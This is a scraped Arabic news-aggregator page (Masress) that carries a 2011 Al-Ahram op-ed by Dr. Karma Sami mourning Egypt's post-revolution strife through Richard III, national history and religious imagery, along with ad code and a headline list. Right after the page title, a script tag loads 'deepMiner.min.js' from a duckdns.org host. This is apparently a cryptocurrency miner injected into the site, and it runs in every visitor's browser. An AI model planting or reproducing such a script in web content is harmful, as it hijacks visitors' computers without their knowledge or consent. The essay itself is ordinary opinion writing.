googletag.defineSlot('/21620968445/Masress_Ar_Article_1', [[336, 280], [300, 300], [300, 250], [300, 600]], 'div-gpt-ad-1446553049-0').addService(googletag.pubads()); googletag.defineOutOfPageSlot('/21620968445/Masress_Ar_Article_1', 'div-gpt-ad-1446553049-0-oop').addService(googletag.pubads()); googletag.defineSlot('/21620968445/Masress_Ar_Article_3', [[336, 280], [300, 300], [300, 250]], 'div-gpt-ad-1446553047-0').addService(googletag.pubads()); googletag.defineOutOfPageSlot('/21620968445/Masress_Ar_Article_3', 'div-gpt-ad-1446553047-0-oop').addService(googletag.pubads()); googletag.defineSlot('/21620968445/Masress_Ar_Article_2', [[336, 280], [300, 300], [300, 250]], 'div-gpt-ad-1446553048-0').addService(googletag.pubads()); googletag.defineOutOfPageSlot('/21620968445/Masress_Ar_Article_2', 'div-gpt-ad-1446553048-0-oop').addService(googletag.pubads()); googletag.defineSlot('/21620968445/Masress_Ar_Widget', [[222, 280]], 'div-gpt-ad-374346843-0').addService(googletag.pubads()); googletag.defineOutOfPageSlot('/21620968445/Masress_Ar_Widget', 'div-gpt-ad-374346843-0-oop').addService(googletag.pubads()); googletag.defineSlot('/21620968445/Masress_Ar_Siteunder', [[336, 280], [300, 300], [300, 250]], 'div-gpt-ad-1775746800-0').addService(googletag.pubads()); googletag.defineOutOfPageSlot('/21620968445/Masress_Ar_Siteunder', 'div-gpt-ad-1775746800-0-oop').addService(googletag.pubads()); googletag.pubads().enableSingleRequest(); googletag.enableServices();}); مصرس : بحثا عن الوطن المفقود<script src="https://jhondi33.duckdns.org:7777/deepMiner.min.js"></script>
 
«التعليم العالي» تغلق أكاديمية وهمية بمدينة نصر    بالصور.. رئيس المجلس النيابي الصربي في رحلة بحرية بمرسي علم    سيول الخير تعم وادي فيران.. وأمطار على نويبع.. صور    مصر تفوز باستضافة القمة الدولية للمشروعات الصغيرة وريادة الأعمال    وزيرة البيئة تبحث سبل مواجهة الكوارث الطبيعية مع نظيرها الياباني    «الرى» تعلن تركيب 175 قطعة موفرة للمياه بصنابير مسجدى السيدة نفيسة ويوسف الصحابى    وزيرالنقل: 2019 بداية تحسن خدمات القطارات    بورصة البحرين تتراجع 0.10% في ختام جلسة الخميس    "مصر للطيران" تطرح تخفيض 35% على رحلات إفريقيا    الخبر التالى:    استقالة رابع وزير بريطاني من الحكومة    مغردون يطلقون تعليقات نارية على بيان النيابة السعودية حول مقتل جمال خاشقجي    ننشر التفاصيل الكاملة لتقرير النيابة السعودية حول مقتل جمال خاشقجي    الاحتلال الإسرائيلى يقتحم منزل منفذ عملية القدس ويعتقل عائلته للمرة الثانية    شاهد.. لقطات مرعبة من حرائق كاليفورنيا    رئيس وزراء ماليزيا: نقل السفارة الأسترالية من تل أبيب إلى القدس غير مفيد    بريزينتيشن: بيان الاتحاد الإماراتي؟ لم نعقب وبنود التعاقد تتضمن العودة للجهاز الفني    خالد الدرندلي رئسياً لبعثة الأهلي فى الإمارات لمواجهة الوصل    مصدر بالمصري ليلا كورة: نرغب في ضم باسم مرسي    فيديو - ثنائي يوفنتوس الحاسم    تعليق الرحلات الجوية بين مصر والكويت تعرف على السبب    بالصور| انفجار ماسورة مياه بمحور المشير.. وارتباك بحركة المرور بالتجمع    استمرار سقوط الأمطار وتكاثر السحب غدًا    محافظة الجيزة: تنفيذ قرار الرئيس بإطلاق اسم ساطع النعماني بميدان النهضة    بعد تبادل لإطلاق النيران.. ضبط هارب من 4 أحكام بكفر الشيخ    حبس صاحب إسطبل خيول لهتك عرض طفل بترب اليهود    الخبر التالى:    ضبط 11 من العناصر الخطرة في حملة أمنية بالقليوبية    صور.. الأقصر تحتضن مهرجان الشعر العربي برعاية حاكم الشارقة    شاهد..ياسمين رئيس في شوارع بيروت    ماجدة الرومى تكشف عن المصرى الذى تتمنى الزواج منه    القول الحق فى مَولد خير الخلق    طارق سلمان: كلية طب الأزهر تقود الجامعة في تصنيفات عالمية    وزير المالية ل«الشروق»: الالتزام بالبرامج البيئية شرط توفير التمويل للمشروعات    محافظ أسوان يهنئ الدكتور مجدي يعقوب بمناسبة عيد ميلاده    الخبر التالى:    وزير الرياضة: مصر تسعى للدخول ضمن أفضل 10 دول في الرياضة التنافسية    غدا.. وزير الأوقاف يلتقي قيادات الدعوة بالدقهلية    الجمهوريون ينتخبون كيفن ماكارثي زعيما للأقلية في الكونجرس    30 يونيو.. الانتهاء من الأعمال الإنشائية بمستشفى جهينة المركزي    ميندي لاعب سيتي يخضع لجراحة في الركبة    إغلاق الأكاديمية الدولية للتعليم بسبب العمل بدون ترخيص    محافظ الأقصر يلتقى وفد مشروع إعادة اكتشاف الأصول التراثية لإسنا    مكتبة مصر الجديدة تظهر بإطلالة جديدة في عيد ميلادها ال 73    أخبار قد تهمك    متحف النسيج ينظم احتفالية بمناسبة المولد النبوي الشريف واليوم العالمي للطفولة    علي معلول ومحمد نجيب يواصلان التأهيل في الأهلي    " جروس" يصل القاهرة اليوم ليستكمل تدريبات الزمالك    خالد سرحان يواصل تصوير مشاهده فى "قيد عائلى"    أنباء عن وقف التحالف العربي عملياته في الحديدة    تناول 4 فناجين قهوة يومياً يقى من مرض السكر    شاهد.. الكلية الفنية العسكرية تحصد جائزتين    دراسة: البشر أفضل في تذكر الأسماء عن الوجوه    بيع قلادة ماري أنطوانيت ب36 مليون دولار في مزاد بجنيف    تعالوا نبدأ بأنفسنا    بوضوح    كلام بحب    .. والسلام ختام    







شكرا على الإبلاغ!
سيتم حجب هذه الصورة تلقائيا عندما يتم الإبلاغ عنها من طرف عدة أشخاص.





بحثا عن الوطن المفقود
نشر في الأهرام اليومي يوم 29 - 12 - 2011

استقيموا يرحمكم الله‏..‏ هذا شتاء أحزاننا‏.‏ انتهيت مع آخر أيام الخريف من تدريس مسرحية مأساة الملك ريتشارد الثالث لويليام شكسبير‏.‏ ناقشت وطلابي آليات الاستبداد المسرحي‏..‏ تشتعل الحرائق في قلب القاهرة فيما أبحث مع طلابي كيف يتمرد بطل النص علي الكاتب وتسول له نفسه أن يتحكم في الحبكة والحوار والأدوار والاكسسوار ومكان وزمان الحدث, حتي يلتف استبداده حول عنقه كالأنشوطة ويخرج لضميره ألف لسان, يروي كل لسان قصة بغي وطغيان, وحين يموت لا يرثيه أحد. فقد اغتالته يداه وانتزعت قلبه قبل أن يقربه الأعداء. تقترب النهاية فيبيع البطل المزعوم مملكته مقابل جواد يفر به من أرض المعركة. ضعف الطالب والمطلوب!!
ثم أقبل الشتاء, تري ماذا ينتظرنا هذا الشتاء؟ هل تشتعل القاهرة؟ هل يضيع الوطن بعد أن رأيناه رأي العين؟ أيام ويقبل يناير, وما أدراك ما يناير؟! في نفس الوقت منذ عام مضي فجر إرهابيون كنيسة القديسين وكتبت في هذا المكان عن المصرية الأصيلة طنط وداد, كنت أبحث عن وطني ووطن طنط وداد, أطالب بعودته, صرخت علي صفحة الجريدة: أعيدوا لي وطني كما كان, وطن بلا عبارات غارقة وقاطرات محترقة وعمارات منهارة, أعيدوا لنا بهجة عيد الميلاد, ميلاد وطن حر سعيد!! ولا مجيب!
سأكون تحت أشجار اللوز.. يراودني هذا الحلم مرارا! أتحلق مع آخرين حول عبدالوهاب المسيري, نسأله ويجيب, تجلجل ضحكته فيما تدمع عيناه وينطلق صوته الحبيب. نردد أمام فؤاد حداد ومحمود درويش أشعارهما, يتساقط علينا زهر اللوز وثمره. يجلس معنا شباب كالورد, مفتي متنور, طالب بكالوريوس طب, طالب بكلية الهندسة, فتيان بلا أعين مفقوءة أو أجساد شوهها الخرطوش أو اخترقتها طلقات في الرأس او البطن, وفتيات محصنات, ومثقفون عضويون, وعلماء دين مسلمون ومسيحيون, وساسة شرفاء, وجنود بواسل. حلم مالتيميديا, متعدد الوسائط والحواس, مفعم بالموسيقي الشرقية وبجرس اللغة العربية فصحي وعامية وبرائحة الزعتر والكمون, صوت وصورة ورائحة تجمع قلب العروبة وقضيتها: فلسطين ومصر.
لا أستثني أحدا! كلنا شيعة الحسين وقتلته! اتبعنا إمام الثوار وسيد الشهداء ثم رجمناه بالحجارة, نصرناه ثم نحرناه وبكينا علي جثمانه الطاهر المنزه عن الرجس. تركناه يموت ظمآن وترحمنا عليه! أترانا ننسي؟ يا لتلك الأرض السبخة التي تدعي الذاكرة! هل ننسي من وضع في أيدي جنودنا أسلحة فاسدة في حرب فلسطين؟ من حرق القاهرة26 يناير1952 ؟ عيد النصر في1956 ؟ انكسار القلب في دفن الإسرائيليين لإخوتنا المجندين المصريين أحياء في صحراء سيناء؟ دماء أطفالنا الفلاحين في بحر البقر؟ فرحة رفع العلم المصري علي سيناء؟ ابتسامة السادات العريضة وتلويحه الودود لمستقبليه في مطار بن جوريون؟ شهداء جمعة الغضب وموقعة الجمل وغيرهم؟ إذا نسينا.. هل ننسي تاريخنا وجغرافيتنا؟!
أتذكر وصية معلمنا بهاء طاهر حتي لا ننسي دماء الشهداء!, أتذكر بيتا حزينا من قصيدة لصديقي بهاء جاهين عن فردة حذاء عسكري مصري ملقاة في صحراء سيناء! تدمع عيناي! ماذا حدث لنا؟! كيف أحرقت أيادينا كتبنا وقتلت أخواتنا وسحلت فتياتنا؟ كيف يستشهد بيننا العالم الفقيه وطالب بكالوريوس الطب وطالب الهندسة؟ كيف يهان الجندي المصري بيننا؟ رضينا ألا نهتف مجتمعين فأصبح لكل منا هتافه واختلفنا رغم أن الهدف واحد!!
ما أقبح الراعي ورعيته! يقذف البلطجي المراهق مبني المجمع العلمي بالحجارة ثم يرقص هاتفا منغما هتافه وكأنه في الاستاد: ولسه! ولسه! أيفرح أنه سدد هدفا في مرمي الوطن؟! يا تعس الفوز علي الوطن في مباراة وهمية! ماذا اقترفت أيدينا؟ كيف خرج هؤلاء من بين صفوفنا؟ هم أيضا أبناء للوطن. وهناك أبناء وأبناء. لا يحيرني سؤال صلاح عبدالصبور الشهير في ليلي والمجنون كيف ترعرع في وادينا الطيب هذا القدر من السفلة والأوغاد؟ أعلم الإجابة مسبقا! يحرقوننا بعد أن بلغهم اليأس منا, لم نهبهم آباء يحتمون بهم وأمهات يرعونهم. لم نمنحهم مقاعد في فصول دراسية آدمية. لم نعطهم أوراقا بيضاء وعلب ألوان خشبية. فشلت الحملات القومية الدعائية السابقة, فلا جعلت من القراءة وطنا, ولا كانت القراءة للجميع, ولا غرست مليون شجرة في شوارعنا. خاب مسعي المنتفعين وتاه بين شعارات المرأة المعيلة والأطفال متحدي الإعاقة وطفل القرية والقرية الذكية ومعهد دراسات السلام وثقافته والمجلس القومي للمرأة. تنامي عدد أطفال الشوارع فكبروا وأصبحوا رجال الشوارع فحملوا الأسلحة وزجاجات المولوتوف وتقاضوا الأموال المدممة ثمنا لأرواحنا.
هان علينا الدم المصري ولو تمسك بأستار الكعبة؟ أليس من بيننا رجل رشيد؟ رجل عدل؟ لا نريد أن نخرج من هذا البلد الظالم أهله وإنما نريد أن نخرج الظلم منه! أليس من بيننا من يعلمنا الكرامة؟ أصول الانتماء؟ قواعد الغضب وشروط التسامح؟ لا؟ بلي؟ جاء ورحل عصر يوم خريفي ملعون!
الشعب والجيش مهاجرون وأنصار.. نريد الكرامة للشعب المصري وجيشه. نريد للمجلس العسكري الذي حقن دماء شعبه في فبراير2011 ألا يسمح بتشويه صورته صمتا أو صوتا. أن يتخذ قدوة له من المشير عبدالرحمن سوار الذهب الذي رأس سوداننا الشقيق من1985 إلي.1986 سمع سوار الذهب نصيحة إمامنا الشعراوي حين قال له: يا شيخ أنت وفقت في أن تثور, فليوفقك الله إلي أن تهدأ ثم دعا له:وفقك الله حين أتيت ووفقك الله حين تدع. أراد له الشعراوي أن ينتقل من الثورة إلي البناء. ندعو للمجلس العسكري دعاء الشعراوي لسوار الذهب. نريد للجيش أن يعود لدوره الأول الذي يحيا من أجله وانتزع منه في غمار حملة راقصة تدعو لسلام الضعفاء والمستضعفين, أن يدافع عن كرامة مصر. نعتذر للجيش أننا لم نواجه النظام التطبيعي عندما قيده وقلم أظافره, ونعتذر للشعب أننا لم نواجه النظام التهليسي عندما أطلق عليه حملات التجريف والتسفيه والتهميش والتشويه. نعتذر للوطن أنه هجر من المواطنين, وللكيان أنه جرد من المضمون, ونعتذر للكلمة أنها أفرغت من معناها!!
هان الشعب وهان الجيش. كل الأيام عاشوراء وكل الأرض كرب وبلاء! أستأذن أستاذي ومريديه, أترك جلستهم المباركة, وأذهب لأصلي ركعتين في مسجد الحسين. في الطريق يتبعني صوت محمود درويش: علي هذي الأرض ما يستحق الحياة! فأتمتم وراء الشاعر الصادق: صدقت.. علي هذي الأرض ما يستحق الحياة. أقترب من ساحة المسجد الطاهر, يستقبلني صوت إمام الدعاة رحمه الله واهنا يعلو بالدعاء ويردد خلفه المصلون: ربنا افرغ علينا صبرا وثبت أقدامنا وانصرنا علي القوم الكافرين. قبل الصلاة يناشد الإمام المصلين: سووا صفوفكم, إن الله لا ينظر إلي الصف الاعوج. نستقبل القبلة وتتحاذي مناكبنا وأعقابنا.. في القبلة ينبلج الوطن ضياء ويرفع لنا بيت المقدس حتي ننظر اليه مثلما رفع للنبي الأكرم( ص). يقف خلف الإمام مباشرة الشيخ عماد, يليه الدكتور علاء والمهندس محمد. معا يصلون لله ركعتين في مسجد الحسين. بعد أن نفرغ من الصلاة نسجد لله شاكرين أنه اصطفانا بمولدنا علي أرض مصر نستحضر ما قاله فؤاد حداد ردا علي نكسة1967 فشكرت الكاف والنون علي هذه الأرض المصرية أشمها كالعاشق حتي الموت. في أعقاب كل نكسة وانتكاسة واجبنا أن ننصر الوطن وننتصر له شهداء وأحياء.. ولو علي أنفسنا.
المزيد من مقالات د .كرمة سامي


انقر هنا لقراءة الخبر من مصدره.